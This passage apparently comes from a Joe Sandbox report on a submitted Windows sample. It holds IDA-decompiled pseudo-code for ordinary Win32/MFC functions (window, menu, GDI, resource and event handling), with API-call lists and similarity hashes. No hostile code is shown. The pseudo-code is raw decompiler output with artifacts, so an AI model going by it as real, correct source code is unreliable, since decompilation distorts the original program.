                  • DragFinish.SHELL32(?), ref: 0040921F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Drag$FileQuery$ActiveFinishWindow
                  • String ID:
                  • API String ID: 892977027-0
                  • Opcode ID: 3d032a88417c343d42d2e43863a739bd58ef8c9bb5453b8cbdf58d110f34be10
                  • Instruction ID: 0dbc43127ea2ce8ae02b0a4d7d8f7e2c132127b2c2e01dcd9ff7c6f5005a244b
                  • Opcode Fuzzy Hash: 3d032a88417c343d42d2e43863a739bd58ef8c9bb5453b8cbdf58d110f34be10
                  • Instruction Fuzzy Hash: E011A375A00118ABCB109F65CC45FDDB7B8FB59314F1045EAE559A3291CBB4AE808F94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 93%
                  			E00428E59(void* __ecx, void* __edx, void* __eflags) {
                  				void* _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* _t9;
                  				void* _t11;
                  				int _t13;
                  				void* _t23;
                  				void* _t29;
                  				intOrPtr* _t31;
                  				void* _t33;
                  				void* _t35;
                  
                  				_t29 = __edx;
                  				_push(__ecx);
                  				_t23 = __ecx;
                  				_t9 = E00404461(__eflags, 0x10);
                  				_t37 = _t9;
                  				if(_t9 == 0) {
                  					_t31 = 0;
                  					__eflags = 0;
                  				} else {
                  					_t31 = E00428E3A(_t9, _t37);
                  				}
                  				_t11 = GetCurrentProcess();
                  				_t13 = DuplicateHandle(GetCurrentProcess(),  *(_t23 + 4), _t11,  &_v8, 0, 0, 2);
                  				_t35 = _t33;
                  				if(_t13 == 0) {
                  					if(_t31 != 0) {
                  						 *((intOrPtr*)( *_t31 + 4))(1);
                  					}
                  					E0042EAA8(_t23, _t29, _t31, _t35, GetLastError(),  *((intOrPtr*)(_t23 + 0xc)));
                  				}
                  				 *((intOrPtr*)(_t31 + 4)) = _v8;
                  				 *((intOrPtr*)(_t31 + 8)) =  *((intOrPtr*)(_t23 + 8));
                  				return _t31;
                  			}
















                  APIs
                    • Part of subcall function 00404461: _malloc.LIBCMT ref: 0040447F
                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00428E8D
                  • GetCurrentProcess.KERNEL32(?,00000000), ref: 00428E93
                  • DuplicateHandle.KERNEL32(00000000), ref: 00428E96
                  • GetLastError.KERNEL32(?), ref: 00428EB1
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
                  • String ID:
                  • API String ID: 3704204646-0
                  • Opcode ID: 9da527475a3e1387b3d6d09f6d7e226383096d634adb75a74a0ecf538e676cf5
                  • Instruction ID: af5f4325da4a8d9e4f0321186dcae96371d0d4a3212ff4cde42e699575839eef
                  • Opcode Fuzzy Hash: 9da527475a3e1387b3d6d09f6d7e226383096d634adb75a74a0ecf538e676cf5
                  • Instruction Fuzzy Hash: 4201BC35700210ABDB10ABA6EC49F1E7BACFBC4750F55846AB904CB291DB74DC018B64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00403AF0(intOrPtr* __ecx, void* __edx, void* __eflags) {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* _t24;
                  				void* _t26;
                  				void* _t33;
                  				intOrPtr* _t35;
                  
                  				_t35 = __ecx;
                  				E0041D1CE(_t26, __ecx, __edx, _t33, __ecx, __eflags);
                  				 *_t35 = 0x44f12c;
                  				 *((intOrPtr*)(_t35 + 0x5c)) = 0;
                  				 *((intOrPtr*)(_t35 + 0x58)) = 0;
                  				 *((intOrPtr*)(_t35 + 0x54)) = 0;
                  				 *((intOrPtr*)(_t35 + 0x60)) = 0;
                  				 *((intOrPtr*)(_t35 + 0x64)) = 0;
                  				 *((intOrPtr*)(_t35 + 0x68)) = 5;
                  				 *((intOrPtr*)(_t35 + 0x6c)) = 0x8003;
                  				 *((intOrPtr*)(_t35 + 0x9c)) = CreateEventA(0, 0, 0, 0);
                  				 *((intOrPtr*)(_t35 + 0xa0)) = CreateEventA(0, 1, 1, 0);
                  				 *((intOrPtr*)(_t35 + 0xa4)) = CreateEventA(0, 0, 0, 0);
                  				_t24 = CreateEventA(0, 0, 0, 0);
                  				 *((intOrPtr*)(_t35 + 0x84)) =  *((intOrPtr*)(_t35 + 0x9c));
                  				 *(_t35 + 0xa8) = _t24;
                  				 *(_t35 + 0x90) = _t24;
                  				 *((intOrPtr*)(_t35 + 0x70)) = 0;
                  				 *((intOrPtr*)(_t35 + 0x88)) =  *((intOrPtr*)(_t35 + 0xa0));
                  				 *((intOrPtr*)(_t35 + 0x8c)) =  *((intOrPtr*)(_t35 + 0xa4));
                  				return _t35;
                  			}











                  APIs
                    • Part of subcall function 0041D1CE: __EH_prolog3.LIBCMT ref: 0041D1D5
                  • CreateEventA.KERNEL32 ref: 00403B29
                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00403B37
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403B43
                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403B4F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CreateEvent$H_prolog3
                  • String ID:
                  • API String ID: 206838378-0
                  • Opcode ID: 23266c3987b3ff5da8ba88f8e17e721f5d67cef59dd7dd30058481ae8eb27049
                  • Instruction ID: ec9cf088c3628b43aeeb3f39e7f916201a3be1a383270fb54bcac765ecbc65bc
                  • Opcode Fuzzy Hash: 23266c3987b3ff5da8ba88f8e17e721f5d67cef59dd7dd30058481ae8eb27049
                  • Instruction Fuzzy Hash: 631156F0900B48AEE3209F6A8884B53FAECFF49358F51482EA1DA87650C7746844CF20
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 94%
                  			E0042EDD4(void* __ebx, void* __ecx, void* __edx, struct tagPOINT* _a8) {
                  				struct tagPOINT _v12;
                  				void* __edi;
                  				struct tagPOINT* _t8;
                  				struct HWND__* _t9;
                  				int _t14;
                  				long _t19;
                  				void* _t20;
                  				struct HWND__* _t22;
                  				struct HWND__* _t23;
                  				struct HWND__* _t26;
                  
                  				_t20 = __edx;
                  				_t8 = _a8;
                  				_v12.x = _t8->x;
                  				_t19 = _t8->y;
                  				_push(_t19);
                  				_v12.y = _t19;
                  				_t9 = WindowFromPoint( *_t8);
                  				_t26 = _t9;
                  				if(_t26 != 0) {
                  					_t22 = GetParent(_t26);
                  					if(_t22 == 0 || E0041FDA4(__ebx, _t20, _t22, _t22, 2) == 0) {
                  						ScreenToClient(_t26,  &_v12);
                  						_t23 = E0041FE4A(_t26, _v12.x, _v12.y);
                  						if(_t23 == 0) {
                  							L6:
                  							_t9 = _t26;
                  						} else {
                  							_t14 = IsWindowEnabled(_t23);
                  							_t9 = _t23;
                  							if(_t14 != 0) {
                  								goto L6;
                  							}
                  						}
                  					} else {
                  						_t9 = _t22;
                  					}
                  				}
                  				return _t9;
                  			}

                  APIs
                  • WindowFromPoint.USER32(?,?), ref: 0042EDED
                  • GetParent.USER32(00000000), ref: 0042EDFB
                  • ScreenToClient.USER32 ref: 0042EE1C
                  • IsWindowEnabled.USER32(00000000), ref: 0042EE35
                  Similarity
                  • API ID: Window$ClientEnabledFromParentPointScreen
                  • String ID:
                  • API String ID: 1871804413-0
                  • Opcode ID: 09ae46004f4857c8d73721675ea0760a74aa4fdc1be718844f7737e07083e2e8
                  • Instruction ID: b4a697f47c67ab9837afbcedfbb94ed47278685bea9992d24b7a779d1c0570bb
                  • Opcode Fuzzy Hash: 09ae46004f4857c8d73721675ea0760a74aa4fdc1be718844f7737e07083e2e8
                  • Instruction Fuzzy Hash: 00018436700524BF87129B9AEC05DAF7BB9EFCA700B59002AF905D7310EB39CD019769
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00404697(void* __ecx, struct HMENU__* _a4) {
                  				int _v8;
                  				struct HMENU__* _v12;
                  				struct HMENU__* _t8;
                  				int _t9;
                  				int _t11;
                  				int _t12;
                  				int _t16;
                  				struct HMENU__* _t19;
                  
                  				if(_a4 != 0) {
                  					_t8 = GetMenuItemCount(_a4);
                  					while(_t8 != 0) {
                  						_t9 = _t8 - 1;
                  						_v12 = _t9;
                  						_t19 = GetSubMenu(_a4, _t9);
                  						if(_t19 == 0) {
                  							L8:
                  							_t8 = _v12;
                  							continue;
                  						}
                  						_t11 = GetMenuItemCount(_t19);
                  						_t16 = 0;
                  						_v8 = _t11;
                  						if(_t11 <= 0) {
                  							goto L8;
                  						} else {
                  							goto L5;
                  						}
                  						while(1) {
                  							L5:
                  							_t12 = GetMenuItemID(_t19, _t16);
                  							if(_t12 >= 0xe130 && _t12 <= 0xe13f) {
                  								break;
                  							}
                  							_t16 = _t16 + 1;
                  							if(_t16 < _v8) {
                  								continue;
                  							}
                  							goto L8;
                  						}
                  						_t8 = _t19;
                  						break;
                  					}
                  					return _t8;
                  				}
                  				return 0;
                  			}

                  APIs
                  Similarity
                  • API ID: CountItemMenu
                  • String ID:
                  • API String ID: 1409047151-0
                  • Opcode ID: 86433844df9c92315779f0bf3a59f81ac8ab8415fea35b458be3f3d47a692d0d
                  • Instruction ID: 8276e2b91934d31df3356f8f8f605792c0e2d79c3701d85367bebcb7180b13e2
                  • Opcode Fuzzy Hash: 86433844df9c92315779f0bf3a59f81ac8ab8415fea35b458be3f3d47a692d0d
                  • Instruction Fuzzy Hash: A001F2B5900109BFDB004B65CC8486F7AA9EBD3344F610837EA01F3290FA7ECD41AA68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0043E6D3(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                  				intOrPtr _t25;
                  				void* _t26;
                  				void* _t28;
                  
                  				_t25 = _a16;
                  				if(_t25 == 0x65 || _t25 == 0x45) {
                  					_t26 = E0043DFC4(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                  					goto L9;
                  				} else {
                  					_t34 = _t25 - 0x66;
                  					if(_t25 != 0x66) {
                  						__eflags = _t25 - 0x61;
                  						if(_t25 == 0x61) {
                  							L7:
                  							_t26 = E0043E0B4(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                  						} else {
                  							__eflags = _t25 - 0x41;
                  							if(__eflags == 0) {
                  								goto L7;
                  							} else {
                  								_t26 = E0043E5D9(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                  							}
                  						}
                  						L9:
                  						return _t26;
                  					} else {
                  						return E0043E51E(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                  					}
                  				}
                  			}

                  APIs
                  Similarity
                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                  • String ID:
                  • API String ID: 3016257755-0
                  • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction ID: 599c970f0d7140b4d8948086046bd40c7f1d60777e1d6830c4359a05df86eb3f
                  • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                  • Instruction Fuzzy Hash: 4F11803240114EBBCF265EC6CC41CEE3F22BB0C394F189416FA18591B1D73AD9B2AB85
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 90%
                  			E0040F188(void* __ebx, void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
                  				void* __edi;
                  				void* __esi;
                  				struct HWND__* _t9;
                  				struct HWND__* _t10;
                  				void* _t14;
                  				void* _t15;
                  				struct HWND__* _t16;
                  				struct HWND__* _t17;
                  
                  				_t14 = __ecx;
                  				_t13 = __ebx;
                  				_t9 = GetDlgItem(_a4, _a8);
                  				_t15 = GetTopWindow;
                  				_t16 = _t9;
                  				if(_t16 == 0) {
                  					L6:
                  					_t10 = GetTopWindow(_a4);
                  					while(1) {
                  						_t17 = _t10;
                  						__eflags = _t17;
                  						if(_t17 == 0) {
                  							goto L10;
                  						}
                  						_t10 = E0040F188(_t13, _t14, _t17, _a8, _a12);
                  						__eflags = _t10;
                  						if(_t10 == 0) {
                  							_t10 = GetWindow(_t17, 2);
                  							continue;
                  						}
                  						goto L10;
                  					}
                  				} else {
                  					if(GetTopWindow(_t16) == 0) {
                  						L3:
                  						_push(_t16);
                  						if(_a12 == 0) {
                  							return E0040EE3C(_t13, _t14);
                  						}
                  						_t10 = E0040EE68(_t14, _t15, _t16, __eflags);
                  						__eflags = _t10;
                  						if(_t10 == 0) {
                  							goto L6;
                  						}
                  					} else {
                  						_t10 = E0040F188(__ebx, _t14, _t16, _a8, _a12);
                  						if(_t10 == 0) {
                  							goto L3;
                  						}
                  					}
                  				}
                  				L10:
                  				return _t10;
                  			}

                  APIs
                  • GetDlgItem.USER32 ref: 0040F195
                  • GetTopWindow.USER32(00000000), ref: 0040F1A8
                    • Part of subcall function 0040F188: GetWindow.USER32(00000000,00000002), ref: 0040F1EF
                  • GetTopWindow.USER32(?), ref: 0040F1D8
                  Similarity
                  • API ID: Window$Item
                  • String ID:
                  • API String ID: 369458955-0
                  • Opcode ID: 68f76c8b40c0a4f109fccf0564f6876d2fd39e1f2526f7d48fb36ded73cfd4b3
                  • Instruction ID: e83c7ebf38d33043e2068e8d2e03b0507baf608e2471e865396bf5c0c4cbf0b1
                  • Opcode Fuzzy Hash: 68f76c8b40c0a4f109fccf0564f6876d2fd39e1f2526f7d48fb36ded73cfd4b3
                  • Instruction Fuzzy Hash: 7D01843600151AF7CB326F62CC04E9F3A25AF853A4F154436FC04B9690EB39CD19A6ED
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042D6BA(void* __ecx, void* __edx, int _a4) {
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				struct HDC__* _t8;
                  				void* _t13;
                  				void* _t16;
                  				void* _t19;
                  				int _t20;
                  				void* _t21;
                  				void* _t22;
                  				void* _t23;
                  
                  				_t19 = __edx;
                  				_t17 = __ecx;
                  				_t20 = _a4;
                  				_t23 = __ecx;
                  				_t16 = GetStockObject(_t20);
                  				if(_t20 < 0xa) {
                  					L6:
                  					_t8 =  *(_t23 + 4);
                  					_t21 = SelectObject;
                  					__eflags = _t8;
                  					if(__eflags != 0) {
                  						SelectObject(_t8, _t16);
                  					}
                  					return E00423045(_t16, _t17, _t21, _t23, __eflags, SelectObject( *(_t23 + 8), _t16));
                  				}
                  				if(_t20 > 0xe) {
                  					if(_t20 <= 0xf) {
                  						goto L6;
                  					}
                  					_t27 = _t20 - 0x11;
                  					if(_t20 > 0x11) {
                  						goto L6;
                  					}
                  				}
                  				_t13 = E00423045(_t16, _t17, _t20, _t23, _t27, SelectObject( *(_t23 + 8), _t16));
                  				_t22 = _t13;
                  				if( *(_t23 + 0x2c) != _t16) {
                  					 *(_t23 + 0x2c) = _t16;
                  					E0042D0D6(_t16, _t23, _t19, _t22);
                  					return _t22;
                  				}
                  				return _t13;
                  			}

                  APIs
                  • GetStockObject.GDI32(?), ref: 0042D6C8
                  • SelectObject.GDI32(?,00000000), ref: 0042D6E8
                  • SelectObject.GDI32(?,00000000), ref: 0042D718
                  • SelectObject.GDI32(?,00000000), ref: 0042D71E
                  Similarity
                  • API ID: Object$Select$Stock
                  • String ID:
                  • API String ID: 3337941649-0
                  • Opcode ID: 2f7f9bea765bc1341faf6002da9c0cd4a18686eb5a479f1f2981bcc4718750c8
                  • Instruction ID: 0014f9278ba29070fe8a6d1f7dd1e75f7b0d1f9d871fab654dfc0410fee6f02e
                  • Opcode Fuzzy Hash: 2f7f9bea765bc1341faf6002da9c0cd4a18686eb5a479f1f2981bcc4718750c8
                  • Instruction Fuzzy Hash: 81018676B003646B86202BBBFC8881F77ADFAD5755385492FF106C3612DA3DDC428B68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E00404E93(intOrPtr __ecx) {
                  				intOrPtr _v8;
                  				long _v12;
                  				struct HWND__* _t21;
                  				intOrPtr* _t30;
                  
                  				_push(__ecx);
                  				_push(__ecx);
                  				_v8 = __ecx;
                  				if( *((intOrPtr*)(__ecx + 0x20)) != 0) {
                  					_t30 = E0040474E(__ecx);
                  					_t21 =  *(_t30 + 0x20);
                  					_v12 = SetWindowLongA(_t21, 0xfffffff0, GetWindowLongA(_t21, 0xfffffff0) & 0xffff7fff);
                  					E00404A2E(_v8);
                  					if(IsWindow(_t21) != 0) {
                  						SetWindowLongA(_t21, 0xfffffff0, _v12);
                  						 *((intOrPtr*)( *_t30 + 0x178))(1);
                  					}
                  					return 1;
                  				} else {
                  					return 0;
                  				}
                  			}

                  APIs
                  Similarity
                  • API ID: Window$Long
                  • String ID:
                  • API String ID: 847901565-0
                  • Opcode ID: 1ae47132c50d68974ba8675a73dd19e1812ace48a7251e8b5cf853d1bf8cc61d
                  • Instruction ID: 4249becefff12f9aa532041eef5b774ba33af07bc398f959ababbc606d27a936
                  • Opcode Fuzzy Hash: 1ae47132c50d68974ba8675a73dd19e1812ace48a7251e8b5cf853d1bf8cc61d
                  • Instruction Fuzzy Hash: E80186B5204214BBDB009B75CC45E9B76ACFF85335F150769F522E32D1DB74D8018A68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 88%
                  			E004122AD(intOrPtr __ecx, CHAR* _a4) {
                  				intOrPtr _v8;
                  				void* __ebx;
                  				void* __edi;
                  				void* __esi;
                  				void* __ebp;
                  				void* _t7;
                  				struct HRSRC__* _t10;
                  				void* _t13;
                  				void* _t18;
                  				void* _t20;
                  				void* _t21;
                  				struct HINSTANCE__* _t23;
                  
                  				_push(__ecx);
                  				_push(_t20);
                  				_t13 = 0;
                  				_t18 = 0;
                  				_v8 = __ecx;
                  				_t24 = _a4;
                  				if(_a4 == 0) {
                  					L4:
                  					_t21 = E00411E27(_v8, _t18, _t18);
                  					if(_t18 != 0 && _t13 != 0) {
                  						FreeResource(_t13);
                  					}
                  					_t7 = _t21;
                  				} else {
                  					_t23 =  *(E0041F363(0, 0, _t20, _t24) + 0xc);
                  					_t10 = FindResourceA(_t23, _a4, 0xf0);
                  					if(_t10 == 0) {
                  						goto L4;
                  					} else {
                  						_t7 = LoadResource(_t23, _t10);
                  						_t13 = _t7;
                  						if(_t13 != 0) {
                  							_t18 = LockResource(_t13);
                  							goto L4;
                  						}
                  					}
                  				}
                  				return _t7;
                  			}

                  APIs
                  • FindResourceA.KERNEL32(?,?,000000F0), ref: 004122D3
                  • LoadResource.KERNEL32(?,00000000), ref: 004122DF
                  • LockResource.KERNEL32(00000000), ref: 004122EC
                  • FreeResource.KERNEL32(00000000), ref: 00412308
                  Similarity
                  • API ID: Resource$FindFreeLoadLock
                  • String ID:
                  • API String ID: 1078018258-0
                  • Opcode ID: 332a509225835964b8b30f771263e14b9896a6b914ce92aa81eca866c340bb78
                  • Instruction ID: eb341e2990d3aa9b8187f0255b35ca994ee6d51934ff18c2a607a87465d7b55a
                  • Opcode Fuzzy Hash: 332a509225835964b8b30f771263e14b9896a6b914ce92aa81eca866c340bb78
                  • Instruction Fuzzy Hash: EFF0AF373002066B97115FE79D84AAFBAACEB82660704407ABE05E3201DEB8DD51C668
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040B7EE(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                  				char _v16;
                  				int _t12;
                  				int _t16;
                  				int _t18;
                  				intOrPtr _t19;
                  				void* _t24;
                  				intOrPtr* _t27;
                  
                  				_t19 = _a4;
                  				_t27 = __ecx;
                  				E004210DA(__ecx, _t19, _a8);
                  				_t12 = E00412B38(__ecx);
                  				if((_t12 & 0x00000100) != 0) {
                  					_t12 = IsZoomed(GetParent( *(__ecx + 0x20)));
                  					if(_t12 == 0) {
                  						 *((intOrPtr*)( *_t27 + 0x118))(0x407, 0,  &_v16, _t24);
                  						_t16 = GetSystemMetrics(5);
                  						_t18 = GetSystemMetrics(2);
                  						 *((intOrPtr*)(_t19 + 8)) =  *((intOrPtr*)(_t19 + 8)) - _t16 + _t16 - _v16 - _t18;
                  						return _t18;
                  					}
                  				}
                  				return _t12;
                  			}

                  APIs
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  • GetParent.USER32(?), ref: 0040B817
                  • IsZoomed.USER32(00000000), ref: 0040B81E
                  • GetSystemMetrics.USER32 ref: 0040B846
                  • GetSystemMetrics.USER32 ref: 0040B854
                  Similarity
                  • API ID: MetricsSystem$LongParentWindowZoomed
                  • String ID:
                  • API String ID: 3909876373-0
                  • Opcode ID: 50fbf73481a51665d2d0241603ecccdcb06c2f19cfcb8e85b1be4ce2a126c7ca
                  • Instruction ID: 534eef765553c006db369b194f787ffef2b2917ffcbab35e9eb90092d6656bda
                  • Opcode Fuzzy Hash: 50fbf73481a51665d2d0241603ecccdcb06c2f19cfcb8e85b1be4ce2a126c7ca
                  • Instruction Fuzzy Hash: 8701A7376002146BDB107BB5DC4AB8ABB68EF54714F058129FB05EB191D674A800CBA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0040D2F2(struct HDC__* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, long _a20) {
                  				long _v12;
                  				void _v16;
                  				intOrPtr _t12;
                  				long _t16;
                  				void* _t21;
                  				void* _t22;
                  				void* _t23;
                  
                  				if(_a4 == 0 || _a16 == 0) {
                  					L10:
                  					return 0;
                  				} else {
                  					_t12 = _a12;
                  					if(_t12 == 1 || _t12 == 0 || _t12 == 5 || _t12 == 2 && E0041FDA4(_t21, _t22, _t23, _a8, _t12) == 0) {
                  						goto L10;
                  					} else {
                  						GetObjectA(_a16, 0xc,  &_v16);
                  						SetBkColor(_a4, _v12);
                  						_t16 = _a20;
                  						if(_t16 == 0xffffffff) {
                  							_t16 = GetSysColor(8);
                  						}
                  						SetTextColor(_a4, _t16);
                  						return 1;
                  					}
                  				}
                  			}











                  APIs
                  • GetObjectA.GDI32(00000000,0000000C,?), ref: 0040D332
                  • SetBkColor.GDI32(00000000,00000000), ref: 0040D33E
                  • GetSysColor.USER32(00000008), ref: 0040D34E
                  • SetTextColor.GDI32(00000000,?), ref: 0040D358
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Color$ObjectText
                  • String ID:
                  • API String ID: 829078354-0
                  • Opcode ID: 0917485d60be57fba84de33db906499c11b2f6a15f302fa225eb6ba83a7df9d6
                  • Instruction ID: bff7330aa8aa4276d550d16e5f7a19a6b3b1f139b7051842c5f6b980f89d7a30
                  • Opcode Fuzzy Hash: 0917485d60be57fba84de33db906499c11b2f6a15f302fa225eb6ba83a7df9d6
                  • Instruction Fuzzy Hash: 27014F35900108ABDF215FB5DC89AAF3BA5FB45314F188132FD51E22E0C734CC99CA5A
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E0042D94D(void* __ecx) {
                  				struct tagPOINT _v12;
                  				struct tagPOINT _v20;
                  				struct HDC__* _t19;
                  
                  				_t19 =  *(__ecx + 8);
                  				if(_t19 != 0 &&  *(__ecx + 4) != 0) {
                  					GetViewportOrgEx(_t19,  &_v12);
                  					E0042D602(__ecx,  &_v12);
                  					_v12.y = _v12.y +  *((intOrPtr*)(__ecx + 0x24));
                  					_v12.x = _v12.x +  *((intOrPtr*)(__ecx + 0x20));
                  					SetViewportOrgEx( *(__ecx + 4), _v12, _v12.y, 0);
                  					GetWindowOrgEx( *(__ecx + 8),  &_v20);
                  					return SetWindowOrgEx( *(__ecx + 4), _v20, _v20.y, 0);
                  				}
                  				return _t19;
                  			}







                  APIs
                  • GetViewportOrgEx.GDI32(?,?), ref: 0042D96A
                    • Part of subcall function 0042D602: GetViewportExtEx.GDI32(?,?), ref: 0042D615
                    • Part of subcall function 0042D602: GetWindowExtEx.GDI32(?,?), ref: 0042D622
                  • SetViewportOrgEx.GDI32(00000000,?,00000000,00000000), ref: 0042D992
                  • GetWindowOrgEx.GDI32(?,?), ref: 0042D99F
                  • SetWindowOrgEx.GDI32(00000000,?,?,00000000), ref: 0042D9B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ViewportWindow
                  • String ID:
                  • API String ID: 1589084482-0
                  • Opcode ID: 78baa2dcdd5e57f3b1789fedd9b210cdbd5642a15fe81d21b903267fcd350980
                  • Instruction ID: 664b9ddbefff46f4c3d2c833485c23bbeb90989938057a150765868531f8da2f
                  • Opcode Fuzzy Hash: 78baa2dcdd5e57f3b1789fedd9b210cdbd5642a15fe81d21b903267fcd350980
                  • Instruction Fuzzy Hash: A9016D75900619FFDF21DB95DC49FAEBBB9FF08700F0044A9F166A21A0D771AA50DB18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00417D95() {
                  				intOrPtr _t16;
                  				struct HWND__* _t19;
                  				intOrPtr _t23;
                  				intOrPtr* _t28;
                  				void* _t29;
                  
                  				_t28 =  *((intOrPtr*)(_t29 - 0x20));
                  				_t23 =  *((intOrPtr*)(_t29 - 0x24));
                  				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
                  					E00412C76(_t23, 1);
                  				}
                  				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
                  					EnableWindow( *(_t29 - 0x14), 1);
                  				}
                  				if( *(_t29 - 0x14) != 0) {
                  					_t19 = GetActiveWindow();
                  					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
                  					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
                  						SetActiveWindow( *(_t29 - 0x14));
                  					}
                  				}
                  				 *((intOrPtr*)( *_t28 + 0x60))();
                  				E004177E3(_t23, _t28, 0, _t28, _t34);
                  				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
                  					FreeResource( *(_t29 - 0x18));
                  				}
                  				_t16 =  *((intOrPtr*)(_t28 + 0x44));
                  				return E00431B73(_t16);
                  			}









                  APIs
                  • EnableWindow.USER32(?,00000001), ref: 00417DB5
                  • GetActiveWindow.USER32 ref: 00417DC0
                  • SetActiveWindow.USER32(?,?,00000024,00401950), ref: 00417DCE
                  • FreeResource.KERNEL32(?,?,00000024,00401950), ref: 00417DEA
                    • Part of subcall function 00412C76: EnableWindow.USER32(?,?), ref: 00412C87
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Window$ActiveEnable$FreeResource
                  • String ID:
                  • API String ID: 253586258-0
